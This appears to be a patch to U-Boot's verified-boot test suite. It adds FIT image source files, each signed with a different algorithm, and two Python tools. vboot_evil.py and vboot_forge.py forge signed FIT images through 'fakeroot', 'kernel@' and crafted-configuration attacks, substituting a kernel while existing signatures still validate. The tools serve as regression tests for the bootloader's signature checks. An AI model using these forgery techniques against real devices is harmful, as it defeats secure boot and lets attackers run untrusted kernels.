+/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + hash-1 { + algo = "sha384"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + hash-1 { + algo = "sha384"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + signature { + algo = "sha384,rsa3072"; + key-name-hint = "dev"; + sign-images = "fdt", "kernel"; + }; + }; + }; +}; diff --git 
a/test/py/tests/vboot/sign-images-algo-arg.its b/test/py/tests/vboot/sign-images-algo-arg.its new file mode 100644 index 00000000000..9144c8b5ad8 --- /dev/null +++ b/test/py/tests/vboot/sign-images-algo-arg.its @@ -0,0 +1,40 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha1-pss.its b/test/py/tests/vboot/sign-images-sha1-pss.its new file mode 100644 index 00000000000..ded7ae4f552 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha1-pss.its @@ -0,0 +1,44 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha1,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha1,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha1.its b/test/py/tests/vboot/sign-images-sha1.its new file mode 100644 index 00000000000..18c759e9e65 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha1.its @@ -0,0 +1,42 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha1,rsa2048"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha1,rsa2048"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha256-pss.its b/test/py/tests/vboot/sign-images-sha256-pss.its new file mode 100644 index 00000000000..34850cc6c58 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha256-pss.its @@ -0,0 +1,44 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha256,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + 
description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha256,rsa2048"; + padding = "pss"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha256.its b/test/py/tests/vboot/sign-images-sha256.its new file mode 100644 index 00000000000..bb0f8ee8a66 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha256.its @@ -0,0 +1,42 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha256,rsa2048"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha256,rsa2048"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/sign-images-sha384.its b/test/py/tests/vboot/sign-images-sha384.its new file mode 100644 index 00000000000..be1a9a653c7 --- /dev/null +++ b/test/py/tests/vboot/sign-images-sha384.its @@ -0,0 +1,42 @@ +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + signature { + algo = "sha384,rsa3072"; + key-name-hint = "dev"; + }; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + signature { + algo = "sha384,rsa3072"; + key-name-hint = "dev"; + }; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot/simple-images.its b/test/py/tests/vboot/simple-images.its new file mode 100644 index 00000000000..f62786456b8 --- /dev/null +++ b/test/py/tests/vboot/simple-images.its @@ -0,0 +1,36 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; + +/ { + description = "Chrome OS kernel image with one or more FDT blobs"; + #address-cells = <1>; + + images { + kernel { + data = /incbin/("test-kernel.bin"); + type = "kernel_noload"; + arch = "sandbox"; + os = "linux"; + compression = "none"; + load = <0x4>; + entry = <0x8>; + kernel-version = <1>; + }; + fdt-1 { + description = "snow"; + data = /incbin/("sandbox-kernel.dtb"); + type = "flat_dt"; + arch = "sandbox"; + compression = "none"; + fdt-version = <1>; + }; + }; + configurations { + default = "conf-1"; + conf-1 { + kernel = "kernel"; + fdt = "fdt-1"; + }; + }; +}; diff --git a/test/py/tests/vboot_evil.py b/test/py/tests/vboot_evil.py new file mode 100644 index 00000000000..e2b0cd65468 --- /dev/null +++ b/test/py/tests/vboot_evil.py @@ -0,0 +1,486 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2020, Intel Corporation + +"""Modifies a devicetree to add a fake root node, for testing purposes""" + +import hashlib +import struct +import sys + +FDT_PROP = 0x3 
+FDT_BEGIN_NODE = 0x1 +FDT_END_NODE = 0x2 +FDT_END = 0x9 + +FAKE_ROOT_ATTACK = 0 +KERNEL_AT = 1 + +MAGIC = 0xd00dfeed + +EVIL_KERNEL_NAME = b'evil_kernel' +FAKE_ROOT_NAME = b'f@keroot' + + +def getstr(dt_strings, off): + """Get a string from the devicetree string table + + Args: + dt_strings (bytes): Devicetree strings section + off (int): Offset of string to read + + Returns: + str: String read from the table + """ + output = '' + while dt_strings[off]: + output += chr(dt_strings[off]) + off += 1 + + return output + + +def align(offset): + """Align an offset to a multiple of 4 + + Args: + offset (int): Offset to align + + Returns: + int: Resulting aligned offset (rounds up to nearest multiple) + """ + return (offset + 3) & ~3 + + +def determine_offset(dt_struct, dt_strings, searched_node_name): + """Determines the offset of an element, either a node or a property + + Args: + dt_struct (bytes): Devicetree struct section + dt_strings (bytes): Devicetree strings section + searched_node_name (str): element path, ex: /images/kernel@1/data + + Returns: + tuple: (node start offset, node end offset) + if element is not found, returns (None, None) + """ + offset = 0 + depth = -1 + + path = '/' + + object_start_offset = None + object_end_offset = None + object_depth = None + + while offset < len(dt_struct): + (tag,) = struct.unpack('>I', dt_struct[offset:offset + 4]) + + if tag == FDT_BEGIN_NODE: + depth += 1 + + begin_node_offset = offset + offset += 4 + + node_name = getstr(dt_struct, offset) + offset += len(node_name) + 1 + offset = align(offset) + + if path[-1] != '/': + path += '/' + + path += str(node_name) + + if path == searched_node_name: + object_start_offset = begin_node_offset + object_depth = depth + + elif tag == FDT_PROP: + begin_prop_offset = offset + + offset += 4 + len_tag, nameoff = struct.unpack('>II', + dt_struct[offset:offset + 8]) + offset += 8 + prop_name = getstr(dt_strings, nameoff) + + len_tag = align(len_tag) + + offset += len_tag + + node_path = path + '/' + str(prop_name) + + if node_path == searched_node_name: + object_start_offset = begin_prop_offset + + elif tag == FDT_END_NODE: + offset += 4 + + path = path[:path.rfind('/')] + if not path: + path = '/' + + if depth == object_depth: + object_end_offset = offset + break + depth -= 1 + elif tag == FDT_END: + break + + else: + print('unknown tag=0x%x, offset=0x%x found!' 
% (tag, offset)) + break + + return object_start_offset, object_end_offset + + +def modify_node_name(dt_struct, node_offset, replcd_name): + """Change the name of a node + + Args: + dt_struct (bytes): Devicetree struct section + node_offset (int): Offset of node + replcd_name (str): New name for node + + Returns: + bytes: New dt_struct contents + """ + + # skip 4 bytes for the FDT_BEGIN_NODE + node_offset += 4 + + node_name = getstr(dt_struct, node_offset) + node_name_len = len(node_name) + 1 + + node_name_len = align(node_name_len) + + replcd_name += b'\0' + + # align on 4 bytes + while len(replcd_name) % 4: + replcd_name += b'\0' + + dt_struct = (dt_struct[:node_offset] + replcd_name + + dt_struct[node_offset + node_name_len:]) + + return dt_struct + + +def modify_prop_content(dt_struct, prop_offset, content): + """Overwrite the value of a property + + Args: + dt_struct (bytes): Devicetree struct section + prop_offset (int): Offset of property (FDT_PROP tag) + content (bytes): New content for the property + + Returns: + bytes: New dt_struct contents + """ + # skip FDT_PROP + prop_offset += 4 + (len_tag, nameoff) = struct.unpack('>II', + dt_struct[prop_offset:prop_offset + 8]) + + # compute padded original node length + original_node_len = len_tag + 8 # content length + prop meta data len + + original_node_len = align(original_node_len) + + added_data = struct.pack('>II', len(content), nameoff) + added_data += content + while len(added_data) % 4: + added_data += b'\0' + + dt_struct = (dt_struct[:prop_offset] + added_data + + dt_struct[prop_offset + original_node_len:]) + + return dt_struct + + +def change_property_value(dt_struct, dt_strings, prop_path, prop_value, + required=True): + """Change a given property value + + Args: + dt_struct (bytes): Devicetree struct section + dt_strings (bytes): Devicetree strings section + prop_path (str): full path of the target property + prop_value (bytes): new property name + required (bool): raise an exception if property not found + + Returns: + bytes: New dt_struct contents + + Raises: + ValueError: if the property is not found + """ + (rt_node_start, _) = determine_offset(dt_struct, dt_strings, prop_path) + if rt_node_start is None: + if not required: + return dt_struct + raise ValueError('Fatal error, unable to find prop %s' % prop_path) + + dt_struct = modify_prop_content(dt_struct, rt_node_start, prop_value) + + return dt_struct + +def change_node_name(dt_struct, dt_strings, node_path, node_name): + """Change a given node name + + Args: + dt_struct (bytes): Devicetree struct section + dt_strings (bytes): Devicetree strings section + node_path (str): full path of the target node + node_name (str): new node name, just node name not full path + + Returns: + bytes: New dt_struct contents + + Raises: + ValueError: if the node is not found + """ + (rt_node_start, rt_node_end) = ( + determine_offset(dt_struct, dt_strings, node_path)) + if rt_node_start is None or rt_node_end is None: + raise ValueError('Fatal error, unable to find root node') + + dt_struct = modify_node_name(dt_struct, rt_node_start, node_name) + + return dt_struct + +def get_prop_value(dt_struct, dt_strings, prop_path): + """Get the content of a property based on its path + + Args: + dt_struct (bytes): Devicetree struct section + dt_strings (bytes): Devicetree strings section + prop_path (str): full path of the target property + + Returns: + bytes: Property value + + Raises: + ValueError: if the property is not found + """ + (offset, _) = determine_offset(dt_struct, dt_strings, 
prop_path) + if offset is None: + raise ValueError('Fatal error, unable to find prop') + + offset += 4 + (len_tag,) = struct.unpack('>I', dt_struct[offset:offset + 4]) + + offset += 8 + tag_data = dt_struct[offset:offset + len_tag] + + return tag_data + + +def kernel_at_attack(dt_struct, dt_strings, kernel_content, kernel_hash): + """Conduct the kernel@ attack + + It fetches from /configurations/default the name of the kernel being loaded. + Then, if the kernel name does not contain any @sign, duplicates the kernel + in /images node and appends '@evil' to its name. + It inserts a new kernel content and updates its images digest. + + Inputs: + - FIT dt_struct + - FIT dt_strings + - kernel content blob + - kernel hash blob + + Important note: it assumes the U-Boot loading method is 'kernel' and the + loaded kernel hash's subnode name is 'hash-1' + """ + + # retrieve the default configuration name + default_conf_name = get_prop_value( + dt_struct, dt_strings, '/configurations/default') + default_conf_name = str(default_conf_name[:-1], 'utf-8') + + conf_path = '/configurations/' + default_conf_name + + # fetch the loaded kernel name from the default configuration + loaded_kernel = get_prop_value(dt_struct, dt_strings, conf_path + '/kernel') + + loaded_kernel = str(loaded_kernel[:-1], 'utf-8') + + if loaded_kernel.find('@') != -1: + print('kernel@ attack does not work on nodes already containing an @ sign!') + sys.exit() + + # determine boundaries of the loaded kernel + (krn_node_start, krn_node_end) = (determine_offset( + dt_struct, dt_strings, '/images/' + loaded_kernel)) + if krn_node_start is None and krn_node_end is None: + print('Fatal error, unable to find root node') + sys.exit() + + # copy the loaded kernel + loaded_kernel_copy = dt_struct[krn_node_start:krn_node_end] + + # insert the copy inside the tree + dt_struct = dt_struct[:krn_node_start] + \ + loaded_kernel_copy + dt_struct[krn_node_start:] + + evil_kernel_name = loaded_kernel+'@evil' + + # change the inserted kernel name + dt_struct = change_node_name( + dt_struct, dt_strings, '/images/' + loaded_kernel, bytes(evil_kernel_name, 'utf-8')) + + # change the content of the kernel being loaded + dt_struct = change_property_value( + dt_struct, dt_strings, '/images/' + evil_kernel_name + '/data', kernel_content) + + # change the content of the kernel being loaded + dt_struct = change_property_value( + dt_struct, dt_strings, '/images/' + evil_kernel_name + '/hash-1/value', kernel_hash) + + return dt_struct + + +def fake_root_node_attack(dt_struct, dt_strings, kernel_content, kernel_digest): + """Conduct the fakenode attack + + It duplicates the original root node at the beginning of the tree. 
+ Then it modifies within this duplicated tree: + - The loaded kernel name + - The loaded kernel data + + Important note: it assumes the UBoot loading method is 'kernel' and the loaded kernel + hash's subnode name is hash@1 + """ + + # retrieve the default configuration name + default_conf_name = get_prop_value( + dt_struct, dt_strings, '/configurations/default') + default_conf_name = str(default_conf_name[:-1], 'utf-8') + + conf_path = '/configurations/'+default_conf_name + + # fetch the loaded kernel name from the default configuration + loaded_kernel = get_prop_value(dt_struct, dt_strings, conf_path + '/kernel') + + loaded_kernel = str(loaded_kernel[:-1], 'utf-8') + + # determine root node start and end: + (rt_node_start, rt_node_end) = (determine_offset(dt_struct, dt_strings, '/')) + if (rt_node_start is None) or (rt_node_end is None): + print('Fatal error, unable to find root node') + sys.exit() + + # duplicate the whole tree + duplicated_node = dt_struct[rt_node_start:rt_node_end] + + # dchange root name (empty name) to fake root name + new_dup = change_node_name(duplicated_node, dt_strings, '/', FAKE_ROOT_NAME) + + dt_struct = new_dup + dt_struct + + # change the value of /<fake_root_name>/configs/<default_config_name>/kernel + # so our modified kernel will be loaded + base = '/' + str(FAKE_ROOT_NAME, 'utf-8') + value_path = base + conf_path+'/kernel' + dt_struct = change_property_value(dt_struct, dt_strings, value_path, + EVIL_KERNEL_NAME + b'\0') + + # change the node of the /<fake_root_name>/images/<original_kernel_name> + images_path = base + '/images/' + node_path = images_path + loaded_kernel + dt_struct = change_node_name(dt_struct, dt_strings, node_path, + EVIL_KERNEL_NAME) + + # change the content of the kernel being loaded + data_path = images_path + str(EVIL_KERNEL_NAME, 'utf-8') + '/data' + dt_struct = change_property_value(dt_struct, dt_strings, data_path, + kernel_content, required=False) + + # update the digest value + hash_path = images_path + str(EVIL_KERNEL_NAME, 'utf-8') + '/hash-1/value' + dt_struct = change_property_value(dt_struct, dt_strings, hash_path, + kernel_digest) + + return dt_struct + +def add_evil_node(in_fname, out_fname, kernel_fname, attack): + """Add an evil node to the devicetree + + Args: + in_fname (str): Filename of input devicetree + out_fname (str): Filename to write modified devicetree to + kernel_fname (str): Filename of kernel data to add to evil node + attack (str): Attack type ('fakeroot' or 'kernel@') + + Raises: + ValueError: Unknown attack name + """ + if attack == 'fakeroot': + attack = FAKE_ROOT_ATTACK + elif attack == 'kernel@': + attack = KERNEL_AT + else: + raise ValueError('Unknown attack name!') + + with open(in_fname, 'rb') as fin: + input_data = fin.read() + + hdr = input_data[0:0x28] + + offset = 0 + magic = struct.unpack('>I', hdr[offset:offset + 4])[0] + if magic != MAGIC: + raise ValueError('Wrong magic!') + + offset += 4 + (totalsize, off_dt_struct, off_dt_strings, off_mem_rsvmap, version, + last_comp_version, boot_cpuid_phys, size_dt_strings, + size_dt_struct) = struct.unpack('>IIIIIIIII', hdr[offset:offset + 36]) + + rsv_map = input_data[off_mem_rsvmap:off_dt_struct] + dt_struct = input_data[off_dt_struct:off_dt_struct + size_dt_struct] + dt_strings = input_data[off_dt_strings:off_dt_strings + size_dt_strings] + + with open(kernel_fname, 'rb') as kernel_file: + kernel_content = kernel_file.read() + + # computing inserted kernel hash + val = hashlib.sha1() + val.update(kernel_content) + hash_digest = val.digest() + + 
if attack == FAKE_ROOT_ATTACK: + dt_struct = fake_root_node_attack(dt_struct, dt_strings, kernel_content, + hash_digest) + elif attack == KERNEL_AT: + dt_struct = kernel_at_attack(dt_struct, dt_strings, kernel_content, + hash_digest) + + # now rebuild the new file + size_dt_strings = len(dt_strings) + size_dt_struct = len(dt_struct) + totalsize = 0x28 + len(rsv_map) + size_dt_struct + size_dt_strings + off_mem_rsvmap = 0x28 + off_dt_struct = off_mem_rsvmap + len(rsv_map) + off_dt_strings = off_dt_struct + len(dt_struct) + + header = struct.pack('>IIIIIIIIII', MAGIC, totalsize, off_dt_struct, + off_dt_strings, off_mem_rsvmap, version, + last_comp_version, boot_cpuid_phys, size_dt_strings, + size_dt_struct) + + with open(out_fname, 'wb') as output_file: + output_file.write(header) + output_file.write(rsv_map) + output_file.write(dt_struct) + output_file.write(dt_strings) + +if __name__ == '__main__': + if len(sys.argv) != 5: + print('usage: %s <input_filename> <output_filename> <kernel_binary> <attack_name>' % + sys.argv[0]) + print('valid attack names: [fakeroot, kernel@]') + sys.exit(1) + + in_fname, out_fname, kernel_fname, attack = sys.argv[1:] + add_evil_node(in_fname, out_fname, kernel_fname, attack) diff --git a/test/py/tests/vboot_forge.py b/test/py/tests/vboot_forge.py new file mode 100644 index 00000000000..b41105bd0e3 --- /dev/null +++ b/test/py/tests/vboot_forge.py @@ -0,0 +1,423 @@ +#!/usr/bin/python3 +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2020, F-Secure Corporation, https://foundry.f-secure.com +# +# pylint: disable=E1101,W0201,C0103 + +""" +Verified boot image forgery tools and utilities + +This module provides services to both take apart and regenerate FIT images +in a way that preserves all existing verified boot signatures, unless you +manipulate nodes in the process. 
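+
+Judging from main() at the bottom of this file, it can also be run as a
+script, e.g. "python3 vboot_forge.py test.fit": it prints the parsed tree,
+applies the crafted-kernel manipulation and writes the forged image to the
+file 'blah'.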
+""" + +import struct +import binascii +from io import BytesIO + +# +# struct parsing helpers +# + +class BetterStructMeta(type): + """ + Preprocesses field definitions and creates a struct.Struct instance from them + """ + def __new__(cls, clsname, superclasses, attributedict): + if clsname != 'BetterStruct': + fields = attributedict['__fields__'] + field_types = [_[0] for _ in fields] + field_names = [_[1] for _ in fields if _[1] is not None] + attributedict['__names__'] = field_names + s = struct.Struct(attributedict.get('__endian__', '') + ''.join(field_types)) + attributedict['__struct__'] = s + attributedict['size'] = s.size + return type.__new__(cls, clsname, superclasses, attributedict) + +class BetterStruct(metaclass=BetterStructMeta): + """ + Base class for better structures + """ + def __init__(self): + for t, n in self.__fields__: + if 's' in t: + setattr(self, n, '') + elif t in ('Q', 'I', 'H', 'B'): + setattr(self, n, 0) + + @classmethod + def unpack_from(cls, buffer, offset=0): + """ + Unpack structure instance from a buffer + """ + fields = cls.__struct__.unpack_from(buffer, offset) + instance = cls() + for n, v in zip(cls.__names__, fields): + setattr(instance, n, v) + return instance + + def pack(self): + """ + Pack structure instance into bytes + """ + return self.__struct__.pack(*[getattr(self, n) for n in self.__names__]) + + def __str__(self): + items = ["'%s': %s" % (n, repr(getattr(self, n))) for n in self.__names__ if n is not None] + return '(' + ', '.join(items) + ')' + +# +# some defs for flat DT data +# + +class HeaderV17(BetterStruct): + __endian__ = '>' + __fields__ = [ + ('I', 'magic'), + ('I', 'totalsize'), + ('I', 'off_dt_struct'), + ('I', 'off_dt_strings'), + ('I', 'off_mem_rsvmap'), + ('I', 'version'), + ('I', 'last_comp_version'), + ('I', 'boot_cpuid_phys'), + ('I', 'size_dt_strings'), + ('I', 'size_dt_struct'), + ] + +class RRHeader(BetterStruct): + __endian__ = '>' + __fields__ = [ + ('Q', 'address'), + ('Q', 'size'), + ] + +class PropHeader(BetterStruct): + __endian__ = '>' + __fields__ = [ + ('I', 'value_size'), + ('I', 'name_offset'), + ] + +# magical constants for DTB format +OF_DT_HEADER = 0xd00dfeed +OF_DT_BEGIN_NODE = 1 +OF_DT_END_NODE = 2 +OF_DT_PROP = 3 +OF_DT_END = 9 + +class StringsBlock: + """ + Represents a parsed device tree string block + """ + def __init__(self, values=None): + if values is None: + self.values = [] + else: + self.values = values + + def __getitem__(self, at): + if isinstance(at, str): + offset = 0 + for value in self.values: + if value == at: + break + offset += len(value) + 1 + else: + self.values.append(at) + return offset + + if isinstance(at, int): + offset = 0 + for value in self.values: + if offset == at: + return value + offset += len(value) + 1 + raise IndexError('no string found corresponding to the given offset') + + raise TypeError('only strings and integers are accepted') + +class Prop: + """ + Represents a parsed device tree property + """ + def __init__(self, name=None, value=None): + self.name = name + self.value = value + + def clone(self): + return Prop(self.name, self.value) + + def __repr__(self): + return "<Prop(name='%s', value=%s>" % (self.name, repr(self.value)) + +class Node: + """ + Represents a parsed device tree node + """ + def __init__(self, name=None): + self.name = name + self.props = [] + self.children = [] + + def clone(self): + o = Node(self.name) + o.props = [x.clone() for x in self.props] + o.children = [x.clone() for x in self.children] + return o + + def __getitem__(self, index): + 
return self.children[index] + + def __repr__(self): + return "<Node('%s'), %s, %s>" % (self.name, repr(self.props), repr(self.children)) + +# +# flat DT to memory +# + +def parse_strings(strings): + """ + Converts the bytes into a StringsBlock instance so it is convenient to work with + """ + strings = strings.split(b'\x00') + return StringsBlock(strings) + +def parse_struct(stream): + """ + Parses DTB structure(s) into a Node or Prop instance + """ + tag = bytearray(stream.read(4))[3] + if tag == OF_DT_BEGIN_NODE: + name = b'' + while b'\x00' not in name: + name += stream.read(4) + name = name.rstrip(b'\x00') + node = Node(name) + + item = parse_struct(stream) + while item is not None: + if isinstance(item, Node): + node.children.append(item) + elif isinstance(item, Prop): + node.props.append(item) + item = parse_struct(stream) + + return node + + if tag == OF_DT_PROP: + h = PropHeader.unpack_from(stream.read(PropHeader.size)) + length = (h.value_size + 3) & (~3) + value = stream.read(length)[:h.value_size] + prop = Prop(h.name_offset, value) + return prop + + if tag in (OF_DT_END_NODE, OF_DT_END): + return None + + raise ValueError('unexpected tag value') + +def read_fdt(fp): + """ + Reads and parses the flattened device tree (or derivatives like FIT) + """ + header = HeaderV17.unpack_from(fp.read(HeaderV17.size)) + if header.magic != OF_DT_HEADER: + raise ValueError('invalid magic value %08x; expected %08x' % (header.magic, OF_DT_HEADER)) + # TODO: read/parse reserved regions + fp.seek(header.off_dt_struct) + structs = fp.read(header.size_dt_struct) + fp.seek(header.off_dt_strings) + strings = fp.read(header.size_dt_strings) + strblock = parse_strings(strings) + root = parse_struct(BytesIO(structs)) + + return root, strblock + +# +# memory to flat DT +# + +def compose_structs_r(item): + """ + Recursive part of composing Nodes and Props into a bytearray + """ + t = bytearray() + + if isinstance(item, Node): + t.extend(struct.pack('>I', OF_DT_BEGIN_NODE)) + if isinstance(item.name, str): + item.name = bytes(item.name, 'utf-8') + name = item.name + b'\x00' + if len(name) & 3: + name += b'\x00' * (4 - (len(name) & 3)) + t.extend(name) + for p in item.props: + t.extend(compose_structs_r(p)) + for c in item.children: + t.extend(compose_structs_r(c)) + t.extend(struct.pack('>I', OF_DT_END_NODE)) + + elif isinstance(item, Prop): + t.extend(struct.pack('>I', OF_DT_PROP)) + value = item.value + h = PropHeader() + h.name_offset = item.name + if value: + h.value_size = len(value) + t.extend(h.pack()) + if len(value) & 3: + value += b'\x00' * (4 - (len(value) & 3)) + t.extend(value) + else: + h.value_size = 0 + t.extend(h.pack()) + + return t + +def compose_structs(root): + """ + Composes the parsed Nodes into a flat bytearray instance + """ + t = compose_structs_r(root) + t.extend(struct.pack('>I', OF_DT_END)) + return t + +def compose_strings(strblock): + """ + Composes the StringsBlock instance back into a bytearray instance + """ + b = bytearray() + for s in strblock.values: + b.extend(s) + b.append(0) + return bytes(b) + +def write_fdt(root, strblock, fp): + """ + Writes out a complete flattened device tree (or FIT) + """ + header = HeaderV17() + header.magic = OF_DT_HEADER + header.version = 17 + header.last_comp_version = 16 + fp.write(header.pack()) + + header.off_mem_rsvmap = fp.tell() + fp.write(RRHeader().pack()) + + structs = compose_structs(root) + header.off_dt_struct = fp.tell() + header.size_dt_struct = len(structs) + fp.write(structs) + + strings = compose_strings(strblock) + 
header.off_dt_strings = fp.tell() + header.size_dt_strings = len(strings) + fp.write(strings) + + header.totalsize = fp.tell() + + fp.seek(0) + fp.write(header.pack()) + +# +# pretty printing / converting to DT source +# + +def as_bytes(value): + return ' '.join(["%02X" % x for x in value]) + +def prety_print_value(value): + """ + Formats a property value as appropriate depending on the guessed data type + """ + if not value: + return '""' + if value[-1] == b'\x00': + printable = True + for x in value[:-1]: + x = ord(x) + if x != 0 and (x < 0x20 or x > 0x7F): + printable = False + break + if printable: + value = value[:-1] + return ', '.join('"' + x + '"' for x in value.split(b'\x00')) + if len(value) > 0x80: + return '[' + as_bytes(value[:0x80]) + ' ... ]' + return '[' + as_bytes(value) + ']' + +def pretty_print_r(node, strblock, indent=0): + """ + Prints out a single node, recursing further for each of its children + """ + spaces = ' ' * indent + print((spaces + '%s {' % (node.name.decode('utf-8') if node.name else '/'))) + for p in node.props: + print((spaces + ' %s = %s;' % (strblock[p.name].decode('utf-8'), prety_print_value(p.value)))) + for c in node.children: + pretty_print_r(c, strblock, indent+1) + print((spaces + '};')) + +def pretty_print(node, strblock): + """ + Generates an almost-DTS formatted printout of the parsed device tree + """ + print('/dts-v1/;') + pretty_print_r(node, strblock, 0) + +# +# manipulating the DT structure +# + +def manipulate(root, strblock): + """ + Maliciously manipulates the structure to create a crafted FIT file + """ + # locate /images/kernel-1 (frankly, it just expects it to be the first one) + kernel_node = root[0][0] + # clone it to save time filling all the properties + fake_kernel = kernel_node.clone() + # rename the node + fake_kernel.name = b'kernel-2' + # get rid of signatures/hashes + fake_kernel.children = [] + # NOTE: this simply replaces the first prop... either description or data + # should be good for testing purposes + fake_kernel.props[0].value = b'Super 1337 kernel\x00' + # insert the new kernel node under /images + root[0].children.append(fake_kernel) + + # modify the default configuration + root[1].props[0].value = b'conf-2\x00' + # clone the first (only?) configuration + fake_conf = root[1][0].clone() + # rename and change kernel and fdt properties to select the crafted kernel + fake_conf.name = b'conf-2' + fake_conf.props[0].value = b'kernel-2\x00' + fake_conf.props[1].value = b'fdt-1\x00' + # insert the new configuration under /configurations + root[1].children.append(fake_conf) + + return root, strblock + +def main(argv): + with open(argv[1], 'rb') as fp: + root, strblock = read_fdt(fp) + + print("Before:") + pretty_print(root, strblock) + + root, strblock = manipulate(root, strblock) + print("After:") + pretty_print(root, strblock) + + with open('blah', 'w+b') as fp: + write_fdt(root, strblock, fp) + +if __name__ == '__main__': + import sys + main(sys.argv) +# EOF |
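
A minimal usage sketch for the vboot_evil helper above (the filenames are
hypothetical; the vboot test is expected to supply its own signed FIT image
and kernel blob):

    import vboot_evil

    # Duplicate the loaded kernel node as '<name>@evil' with tampered data and
    # a recomputed sha1 value in its hash-1 subnode
    vboot_evil.add_evil_node('test.fit', 'test-kernel-at.fit',
                             'evil-kernel.bin', 'kernel@')

    # Prepend a fake root node whose default configuration points at an
    # 'evil_kernel' image carrying the tampered payload
    vboot_evil.add_evil_node('test.fit', 'test-fakeroot.fit',
                             'evil-kernel.bin', 'fakeroot')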